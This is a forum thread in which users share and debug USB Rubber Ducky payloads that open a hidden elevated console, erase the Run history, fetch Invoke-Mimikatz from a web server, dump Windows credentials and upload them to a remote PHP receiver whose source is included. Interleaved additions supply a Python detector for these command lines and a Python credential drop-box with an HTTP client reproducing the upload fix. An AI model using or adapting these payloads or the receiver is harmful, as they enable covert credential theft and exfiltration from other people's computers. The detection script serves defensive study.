0x41414141 Posted October 22, 2016 (edited)

I've optimized the Mr. Robot hack to run faster (regardless of web server response times, latency, etc.) and more covertly. Feel free to use the techniques with other payloads. Once the FE (white/yellow) command prompt closes you can remove the Rubber Ducky and the script will continue to exfiltrate creds in the background.

    DELAY 1000
    GUI r
    DELAY 500
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
    ENTER
    DELAY 2000
    ALT y
    DELAY 1000
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('https://example.com/rx.php',$o)"&exit
    ENTER

Edited November 8, 2016 by 0x41414141 (clarification)
Us3rnotfound Posted October 25, 2016 (edited)

You don't know how to make the script work without a web server by any chance, do you? I'd like to get the information to save on the Ducky itself.

Edited October 25, 2016 by Us3rnotfound
0x41414141 (Author) Posted October 25, 2016

3 hours ago, Us3rnotfound said: You don't know how to make the script work without a web server by any chance, do you? I'd like to get the information to save on the Ducky itself.

Do you already have a working version of c_duck_v2.1.hex?
Us3rnotfound Posted October 25, 2016

3 hours ago, 0x41414141 said: Do you already have a working version of c_duck_v2.1.hex?

I have the brand new device and the encoder program, that's about it.
0x41414141 (Author) Posted October 25, 2016 (edited)

On 10/25/2016 at 7:44 AM, Us3rnotfound said: I have the brand new device and the encoder program, that's about it.

In that case you'll need to flash your firmware to a composite edition (i.e. c_duck_v2.1.hex) to function as a Twin Duck (both a USB drive and HID device). Here is a hybrid script that will work on your current default firmware. It will download the PowerShell script from a remote web server and save the mimikatz output to the local machine in the %temp% folder.

    DELAY 1000
    GUI r
    DELAY 500
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
    ENTER
    DELAY 2000
    ALT y
    DELAY 1000
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://paste.ee/r/Xopop');Invoke-Mimikatz -DumpCreds|Out-File '%temp%\mimikatz.txt';"&exit
    ENTER

I'll follow up with another version for the Twin Duck firmware.

Edited November 8, 2016 by 0x41414141
0x41414141 (Author) Posted October 26, 2016 (edited)

Here's a version for the Twin Duck. Make sure you leave the Ducky plugged in long enough for the creds file to be written in the background.

    DELAY 1000
    GUI r
    DELAY 500
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
    ENTER
    DELAY 2000
    ALT y
    DELAY 1000
    STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCK"') do @set duck=%d
    ENTER
    DELAY 500
    STRING if exist %duck%\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';"
    ENTER

Edited November 8, 2016 by 0x41414141 (clarification)
scottisheyebrow Posted November 1, 2016

This hack looks really great! I'm new to the Rubber Ducky. Is there any way someone could change these commands to work on OS X? Thanks!
Bitbot17 Posted November 3, 2016

Do you have a link for the Twin Duck firmware? Also, does the last script you wrote also contain the scripts to remove evidence (PowerShell, CMD, and Run command)? Because I want to try this out on my own computer.
0x41414141 (Author) Posted November 3, 2016 (edited)

1 hour ago, Bitbot17 said: Do you have a link for the Twin Duck firmware? Also, does the last script you wrote also contain the scripts to remove evidence (PowerShell, CMD, and Run command)? Because I want to try this out on my own computer.

Sure, I recommend you install Git to download all the relevant Rubber Ducky code. Once you've installed Git, simply run the following command to clone everything:

    git clone https://github.com/hak5darren/USB-Rubber-Ducky.git

From there, follow the instructions posted at https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky

The Twin Duck firmware is located in USB-Rubber-Ducky/Firmware/Images/ -- there are several versions, but try c_duck_v2.1.hex.

Yes, the last script also cleans up the evidence. If you use the script, make sure you download Invoke-Mimikatz.ps1 and copy/rename it on your Twin Duck as im.ps1. You'll also need to modify the drive volume label to read DUCK.

Edited November 3, 2016 by 0x41414141 (clarification)
Darren Kitchen Posted November 5, 2016

Fantastic payload 0x41414141. I really like the run line that both opens an obfuscated CMD as well as removes all traces of the command. Might I make one alteration? On Windows 10 you'll receive the following error:

    The screen cannot be set to the number of lines and columns specified.

This is because Windows 10 has a minimum command prompt column size of 18, unlike the 14 of previous versions. So to cover most bases, I recommend:

    STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"

Superb payload!
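The run line praised above (hidden, elevated, one-line console that wipes the Win+R history) is covert on screen but distinctive in process-creation telemetry. The following Python triage script is an added example written for this page, not code from the thread: it scores constructed process-creation records for the switches and strings the payload leaves behind and shows why a benign `-ExecutionPolicy Bypass -File` admin script stays below the threshold. The record layout (`ParentImage|Image|CommandLine`, as a Sysmon Event ID 1 export might provide), the indicator weights and the sample records are all assumptions.

```python
"""Score Windows process-creation records for the traces this run line leaves.

Added example for this page, not code from the thread. The record layout
(ParentImage|Image|CommandLine, as a Sysmon Event ID 1 export might give it),
the indicator weights and the sample records are all assumptions."""
import re

# (indicator, pattern, weight). Weights are a tuning assumption, not a standard.
INDICATORS = [
    ("ps_hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2),
    ("ps_exec_bypass", re.compile(r"-e(xec|xecutionpolicy|p)?\s+bypass", re.I), 2),
    ("ps_nop_noni", re.compile(r"-nop\b.*-noni\b", re.I), 1),
    # wiping the Win+R history is the "removes all traces" part of the run line
    ("runmru_wipe", re.compile(r"reg(\.exe)?\s+delete\s+.*\\RunMRU\b", re.I), 3),
    # a one-line console is how the elevated cmd stays unobtrusive
    ("tiny_console", re.compile(r"mode\s+con\s+lines=1\b", re.I), 2),
    ("fe_console_colour", re.compile(r"/t:fe\b", re.I), 1),
    ("download_cradle", re.compile(r"Net\.WebClient\)\.DownloadString\(", re.I), 3),
    ("exfil_upload", re.compile(r"\.UploadString\(", re.I), 3),
    ("mimikatz", re.compile(r"Invoke-Mimikatz|sekurlsa", re.I), 4),
]


def score(cmdline):
    """Return (total weight, [matched indicator names]) for one command line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmdline)]
    total = sum(w for name, _, w in INDICATORS if name in hits)
    return total, hits


def triage(records, threshold=5):
    """Parse 'parent|image|cmdline' records and return (score, parent, image,
    hits) for each one at or above threshold, highest score first."""
    flagged = []
    for rec in records:
        parent, image, cmdline = rec.split("|", 2)
        total, hits = score(cmdline)
        if total >= threshold:
            flagged.append((total, parent, image, hits))
    flagged.sort(key=lambda r: r[0], reverse=True)
    return flagged


# Constructed sample telemetry: the thread's two run lines, then three benign
# records that share individual switches with them.
SAMPLE_RECORDS = r"""
C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('https://example.com/rx.php',$o)"
C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1
C:\Windows\System32\services.exe|C:\Windows\System32\reg.exe|reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd /k mode con lines=50 cols=120
""".strip().splitlines()


if __name__ == "__main__":
    for total, parent, image, hits in triage(SAMPLE_RECORDS):
        print(f"{total:>3}  {parent} -> {image}\n     {', '.join(hits)}")
```

Run stand-alone it flags only the two payload lines: the download-and-exfiltrate stage scores 15 and the hidden elevated cmd with the RunMRU wipe scores 11, while the scheduled backup script scores 2 for its lone `-ExecutionPolicy Bypass`. Note that the `reg delete ... RunMRU` itself shows up as a separate child process of the elevated cmd, so the same patterns apply to its own command line, not just the parent's.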
Decoy Posted November 8, 2016

This is unbelievably fast... and quiet :) Great payload.
Zereco Posted November 10, 2016

Hey guys, awesome! After 3 hours and so many things learned, it's finally running properly! :) (Twin Duck)

Here's the full payload. There's an ESC to close the autorun window, set-executionpolicy remotesigned to allow running scripts on the system, and ALT F4 at the end to close windows.

    DELAY 3000
    ESC
    DELAY 500
    GUI r
    DELAY 1000
    STRING powershell
    DELAY 300
    ENTER
    DELAY 300
    STRING set-executionpolicy remotesigned
    DELAY 300
    ENTER
    DELAY 300
    STRING o
    DELAY 300
    ENTER
    DELAY 300
    STRING exit
    DELAY 300
    ENTER
    DELAY 500
    GUI r
    DELAY 300
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=40 cols=160&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
    DELAY 500
    ENTER
    DELAY 1000
    STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set DUCKY=%d
    DELAY 300
    ENTER
    DELAY 1000
    STRING if exist %DUCKY%\mimi.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %DUCKY%\mimi.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%DUCKY%\%computername%_creds.txt';"
    DELAY 300
    ENTER
    DELAY 300
    ALT F4

Still, it needs 5-10 seconds to write the log file.

Something else: at https://ducktoolkit.com/encoder/ we apparently need to wipe the browser cache or something like that, because when you encode, it seems to encode the first payload you already encoded before (am I clear? :P). Or it's just a bad move from me.

Cheers guys
Bitbot17 Posted November 21, 2016 (edited)

@Darren Kitchen, can you update the link in your GitHub tutorial for the USB Rubber Ducky from this link http://code.google.com/p/ducky-decode/source/browse/trunk/Flash/Duck%20Programming.zip to https://github.com/midnitesnake/USB-Rubber-Ducky/blob/master/Flash/Duck Programming.zip ? It took me an hour to find the file. And how do I put the payload on the Ducky via Windows?

Edited November 21, 2016 by Bitbot17
Bitbot17 Posted November 21, 2016

On 10/25/2016 at 9:39 PM, 0x41414141 said: Here's a version for the Twin Duck. Make sure you leave the Ducky plugged in long enough for the creds file to be written in the background. [Twin Duck payload quoted from above]

So I made the payload and tried it on my machine, but I am receiving an error that says it could not find 'for' and 'xist'. I am running Windows 7 Pro.
BrandonEckert Posted December 7, 2016

Good evening, I have been trying to get this (as well as the original script) to successfully work to no avail. When I manually run the PowerShell command, I receive the following error. Any ideas?

    Exception calling "UploadString" with "2" argument(s): "The remote server returned an error: (417) Expectation Failed."
    At line:1 char:151
    + IEX(New-Object Net.WebClient).DownloadString('http://<my domain.com>/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString <<<< ('http://<my domain.com>/capture.php',$o)
        + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
        + FullyQualifiedErrorId : DotNetMethodException
Enzym3 Posted December 7, 2016

3 hours ago, BrandonEckert said: Good evening, I have been trying to get this (as well as the original script) to successfully work to no avail. When I manually run the PowerShell command, I receive the following error. Any ideas? [...] "The remote server returned an error: (417) Expectation Failed." [...]

Is that the EXACT output from the console, or did you edit the URL for privacy before posting? If this is copied straight from your console, then the problem would be:

    IEX(New-Object Net.WebClient).DownloadString('http://<my domain.com>/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://<my domain.com>/capture.php',$o)

You'd need to change the <my domain.com> placeholders to an actual domain which you wish to use. I have a feeling you edited it like that on purpose, but it wouldn't be the first time I've seen someone copy/paste code and run it without noticing it needs to be modified to fit first.
Enzym3 Posted December 7, 2016

4 hours ago, BrandonEckert said: [...] "The remote server returned an error: (417) Expectation Failed." [...]

If my above response wasn't helpful, try adding this line of code before the Net.WebClient line:

    [System.Net.ServicePointManager]::Expect100Continue = $false

http://stackoverflow.com/questions/566437/http-post-returns-error-417-expectation-failed
BrandonEckert Posted December 7, 2016

Sorry, yes I did redact my domain. I added that and now receive the following. Any ideas?

    Exception calling "UploadString" with "2" argument(s): "The remote server returned an error: (406) Not Acceptable."
    At line:1 char:151
    + IEX(New-Object Net.WebClient).DownloadString('http://<my domain>/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString <<<< ('http://<my domain>/capture.php',$o)
        + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
        + FullyQualifiedErrorId : DotNetMethodException
BrandonEckert Posted December 7, 2016

Just realized I had a typo, but the original error I had still exists. Below is the command I am running, as well as the output:

    C:\Windows\system32>powershell -NoP -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue = $false;(New-Object Net.WebClient).UploadString('http://10.0.0.199/capture.php',$o)"

    Exception calling "UploadString" with "2" argument(s): "The remote server returned an error: (417) Expectation Failed."
    At line:1 char:204
    + IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue = $false;(New-Object Net.WebClient).UploadString <<<< ('http://10.0.0.199/capture.php',$o)
        + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
        + FullyQualifiedErrorId : DotNetMethodException
Mr.X Posted December 8, 2016

On 10/26/2016 at 3:39 AM, 0x41414141 said: Here's a version for the Twin Duck. Make sure you leave the Ducky plugged in long enough for the creds file to be written in the background. [Twin Duck payload quoted from above]

I ran it together with the correct im.ps1 on a Windows 10 machine (yes, my USB is named 'DUCK'). Commands ran properly until the last STRING, I think; then the PowerShell session just did nothing and hung on the last string. A file was never created, so I am assuming mimikatz didn't even run. Could it be the case sensitivity in 'do @set duck=%d' and %duck%? I have the feeling the last IF isn't executed because it returns False.
shr00mie Posted December 24, 2016

On 12/7/2016 at 3:54 PM, BrandonEckert said: Just realized I had a typo, but the original error I had still exists. Below is the command I am running, as well as the output: [...] "The remote server returned an error: (417) Expectation Failed." [...]

I was having the same problem. Definitely spent quite a bit of time on the interwebs trying to figure this particular bitch out. Turns out it has something to do with HTML1.0 vs 1.1 and how it relates to the "Expect and 100 (Continue)" component: http://www8.org/w8-papers/5c-protocols/key/key.html

    Expect and 100 (Continue)

    Some HTTP requests (for example, the PUT or POST methods) carry request bodies, which may be arbitrarily long. If the server is not willing to accept the request, perhaps because of an authentication failure, it would be a waste of bandwidth to transmit such a large request body. HTTP/1.1 includes a new status code, 100 (Continue), to inform the client that the request body should be transmitted. When this mechanism is used, the client first sends its request headers, then waits for a response. If the response is an error code, such as 401 (Unauthorized), indicating that the server does not need to read the request body, the request is terminated. If the response is 100 (Continue), the client can then send the request body, knowing that the server will accept it.

    However, HTTP/1.0 clients do not understand the 100 (Continue) response. Therefore, in order to trigger the use of this mechanism, the client sends the new Expect header, with a value of 100-continue. (The Expect header could be used for other, future purposes not defined in HTTP/1.1.) Because not all servers use this mechanism (the Expect header is a relatively late addition to HTTP/1.1, and early "HTTP/1.1" servers did not implement it), the client must not wait indefinitely for a 100 (Continue) response before sending its request body. HTTP/1.1 specifies a number of somewhat complex rules to avoid either infinite waits or wasted bandwidth. We lack sufficient experience based on deployed implementations to know if this design will work efficiently.

While someone provided the solution, the trick is that it has to be the first command in the line. Current working theory is that after PS loads Net.WebClient, you are no longer able to alter the configuration it's already running as for the remainder of the session. If you, on the other hand, change the setting before any Net.WebClient components are loaded in the session, subsequent Net.WebClient instances launched for the remainder of the session will pull from this configuration. Below is how I finally got the code to work without throwing any errors on the PS side.

    [System.Net.ServicePointManager]::Expect100Continue = $false ; IEX (New-Object Net.WebClient).DownloadString('http://ADDRESS/im.ps1') ; $output = Invoke-Mimikatz -DumpCreds ; (New-Object Net.WebClient).UploadString('http://ADDRESS/rx.php' , $output )

Then I banged my head against the table for a good 24 hours trying to figure out why the server/rx.php script wasn't creating the .creds file. A good night's sleep and a clear head did the trick.
henna3 Posted January 14, 2017

I have a quick little problem. The code and everything runs perfectly fine. My problem is that when the UAC prompt comes up, it comes up as a non-active window. So, when ALT y is being pressed it's not being pressed in the UAC prompt window. Is there any way to fix this issue/workaround? Amazing Twin Duck payload! Thanks.
felipe Posted January 20, 2017 (edited)

Unfortunately mimikatz got detected. Do not upload anything to VirusTotal.

Edited January 20, 2017 by felipe
MrMoi Posted February 5, 2017

Hi @0x41414141, can you please show us the source code of your file "rx.php"? Thank you
0x41414141 (Author) Posted February 6, 2017

On 2/5/2017 at 2:39 AM, MrMoi said: Hi @0x41414141, can you please show us the source code of your file "rx.php"? Thank you

Here you go.

    <?php
    // Name the drop after the posting client's address and the receipt time.
    $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
    // Write the raw POST body (the UploadString payload) straight to that file.
    file_put_contents($file, file_get_contents("php://input"));
    ?>
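The rx.php above and the 417 discussion earlier in the thread (Enzym3's `Expect100Continue = $false` fix and shr00mie's finding that it only works when it runs first) are two halves of one exchange: .NET's WebClient sends `Expect: 100-continue` on every POST and waits for the server's verdict before sending the body. The following Python is an added example written for this page, not the author's rx.php and not .NET code: a drop-box receiver equivalent to rx.php, a second receiver that refuses the Expect header the way the server in the thread did, and a raw HTTP/1.1 client that plays the WebClient side with and without the Expect header so both outcomes can be observed offline on 127.0.0.1. The `/rx.php` route, the file naming and the sample body are assumptions.

```python
"""Drop-box receiver standing in for rx.php, plus a raw HTTP/1.1 client that
reproduces the 417 Expectation Failed from this thread.

Added example for this page, not the author's rx.php and not .NET code. The
/rx.php route, file layout and sample body are assumptions."""
import functools, os, re, socket, tempfile, threading, time, uuid
from http import HTTPStatus
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


class DropHandler(BaseHTTPRequestHandler):
    """Saves each POST body as <addr>_<timestamp>_<id>.creds, like rx.php.
    http.server answers 'Expect: 100-continue' with '100 Continue' by default."""
    protocol_version = "HTTP/1.1"  # the 100-continue handshake needs HTTP/1.1

    def __init__(self, *args, out_dir, **kwargs):
        self.out_dir = out_dir
        super().__init__(*args, **kwargs)  # handles the request right away

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", "0")))
        # rx.php puts REMOTE_ADDR straight into the path; keep only address
        # characters and add a random suffix so same-second posts cannot collide.
        addr = re.sub(r"[^0-9a-fA-F.:]", "_", self.client_address[0])
        name = f"{addr}_{time.strftime('%Y-%m-%d_%H-%M-%S')}_{uuid.uuid4().hex[:8]}.creds"
        with open(os.path.join(self.out_dir, name), "xb") as fh:
            fh.write(body)
        self.send_response(HTTPStatus.OK)
        self.send_header("Content-Length", "0")
        self.send_header("Connection", "close")
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


class StrictHandler(DropHandler):
    """Rejects the Expect header outright, as the thread's server did: the
    client never gets to send its body and WebClient surfaces the 417."""
    def handle_expect_100(self):
        self.send_error(HTTPStatus.EXPECTATION_FAILED)
        return False


def _read_response(sock):
    """Read one response: status line, headers, then a Content-Length body."""
    buf = b""
    while b"\r\n\r\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("peer closed before sending a status line")
        buf += chunk
    head, _, body = buf.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split()[1])
    length = 0
    for line in lines[1:]:
        key, _, value = line.partition(":")
        if key.strip().lower() == "content-length":
            length = int(value)
    while len(body) < length:
        chunk = sock.recv(4096)
        if not chunk:
            break
        body += chunk
    return status, body[:length]


def post_raw(host, port, path, body, expect100):
    """POST the way WebClient.UploadString does. Returns (interim, final):
    interim is 100 if the server accepted the Expect, the refusal code if it
    did not, or None when no Expect header was sent (Expect100Continue=$false)."""
    request = (f"POST {path} HTTP/1.1\r\nHost: {host}:{port}\r\n"
               f"Content-Type: text/plain\r\nContent-Length: {len(body)}\r\n"
               + ("Expect: 100-continue\r\n" if expect100 else "") + "\r\n").encode()
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(request)
        interim = None
        if expect100:
            interim, _ = _read_response(sock)  # wait for the server's verdict
            if interim != HTTPStatus.CONTINUE:
                return interim, interim  # refused: the body is never sent
        sock.sendall(body)
        status, _ = _read_response(sock)
        return interim, status


def run_demo():
    """Run both servers on 127.0.0.1, post with and without Expect, and report
    the status pairs plus the number of .creds files written."""
    out_dir = tempfile.mkdtemp(prefix="creds_")
    sample = b"mimikatz # sekurlsa::logonpasswords\n(constructed sample output)\n"
    results = {}
    for label, handler in (("lenient", DropHandler), ("strict", StrictHandler)):
        server = ThreadingHTTPServer(("127.0.0.1", 0),
                                     functools.partial(handler, out_dir=out_dir))
        threading.Thread(target=server.serve_forever, daemon=True).start()
        port = server.server_address[1]
        results[label] = {
            "expect_on": post_raw("127.0.0.1", port, "/rx.php", sample, True),
            "expect_off": post_raw("127.0.0.1", port, "/rx.php", sample, False),
        }
        server.shutdown()
        server.server_close()
    results["files_written"] = sum(f.endswith(".creds") for f in os.listdir(out_dir))
    return results
```

Calling `run_demo()` gives `(100, 200)` and `(None, 200)` against the lenient server, and `(417, 417)` then `(None, 200)` against the strict one: with the Expect header the strict server refuses before the body is ever sent, which is exactly the exception BrandonEckert saw; without it the same POST succeeds. shr00mie's ordering observation has a concrete cause: `ServicePointManager.Expect100Continue` is a process-wide default that .NET copies into the per-host ServicePoint when that ServicePoint is first created, so once `DownloadString` has already talked to the host, a later assignment does not reach the cached ServicePoint used for `UploadString`; it has to run before the first request to that host. Two caveats on the rx.php it stands in for: `file_put_contents` overwrites, so two uploads from the same address within one second clobber each other, and the relative `$file` lands in the script's own directory, i.e. inside the web root, where the web server will happily serve the `.creds` file to anyone who guesses its name.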